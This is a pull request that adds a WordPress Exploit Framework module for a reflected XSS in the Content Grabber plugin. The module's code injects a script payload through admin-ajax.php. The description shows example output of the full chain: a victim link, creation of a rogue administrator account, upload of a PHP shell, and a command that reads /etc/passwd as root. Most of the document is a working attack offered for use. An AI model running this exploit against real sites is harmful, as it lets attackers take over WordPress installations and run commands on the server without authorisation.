### PR TITLE
Add Content Grabber reflected XSS shell upload

### DIFF
--- a/modules/exploits/content_grabber_reflected_xss_shell_upload.rb
+++ b/modules/exploits/content_grabber_reflected_xss_shell_upload.rb
@@ -1,0 +1,41 @@
+class Wpxf::Exploit::ContentGrabberReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Content Grabber <= 1.0 Reflected XSS Shell Upload',
+      author: [
+        'Morten Nørtoft',                    # Discovery and disclosure
+        'Kenneth Jepsen',                    # Discovery and disclosure
+        'Mikkel Vej',                        # Discovery and disclosure
+        'phyushin <phyushin[at]phyubox.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8134'],
+        ['URL', 'https://packetstormsecurity.com/files/132910/']
+      ],
+      date: 'Jun 14 2015'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('content-grabber')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin-ajax.php')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'action' => 'get_terms_taxonomies',
+      'post_type' => 'post',
+      'obj_field_name' => Utility::Text.rand_alpha(10),
+      'obj_field_id' =>  "widget-cg_content_grabber-3-cat_id\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>",
+      'cat_id_array' => '[\"1\"]'
+    )
+  end
+end


### PR DESCRIPTION
This module exploits the Content Grabber WordPress plugin; which prints two unsanitised parameters when the 'get_terms_taxonomies' action is executed

the vulnerable plugin code can be downloaded from WordPress' SVN:
http://plugins.svn.wordpress.org/content-grabber/trunk

**References**

- https://packetstormsecurity.com/files/132910/
- https://wpvulndb.com/vulnerabilities/8134

example output:
```
wpxf > use exploit/content_grabber_reflected_xss_shell_upload

  [+] Loaded module: #<Wpxf::Exploit::ContentGrabberReflectedXssShellUpload:0x00000004f540e8>

wpxf [exploit/content_grabber_reflected_xss_shell_upload] > check

  [!] One or more required options not set: host, xss_host, payload

wpxf [exploit/content_grabber_reflected_xss_shell_upload] > set host 192.168.0.27

  [+] Set host => 192.168.0.27

wpxf [exploit/content_grabber_reflected_xss_shell_upload] > set xss_host 192.168.0.13

  [+] Set xss_host => 192.168.0.13

wpxf [exploit/content_grabber_reflected_xss_shell_upload] > set payload exec

  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x000000049ce790>

wpxf [exploit/content_grabber_reflected_xss_shell_upload] > check

  [!] Target appears to be vulnerable

wpxf [exploit/content_grabber_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.13/RhhAaUHz/auOOUejrb

  [-] Started HTTP server on 0.0.0.0:80
  [-] Initial request received...
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, Yjmkmi:TZznIDDsCR
  [-] HTTP server stopped
  [-] Authenticating with WordPress using Yjmkmi:TZznIDDsCR...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.27/wp-content/plugins/SKgYGQppnR/fkAONJUGcB.php...
  [+] Result: root:x:0:0:root:/root:/bin/bash
...
  [+] Execution finished successfully
``` 
edit:
- corrected typos and corrected example execution - it now shows as a code block
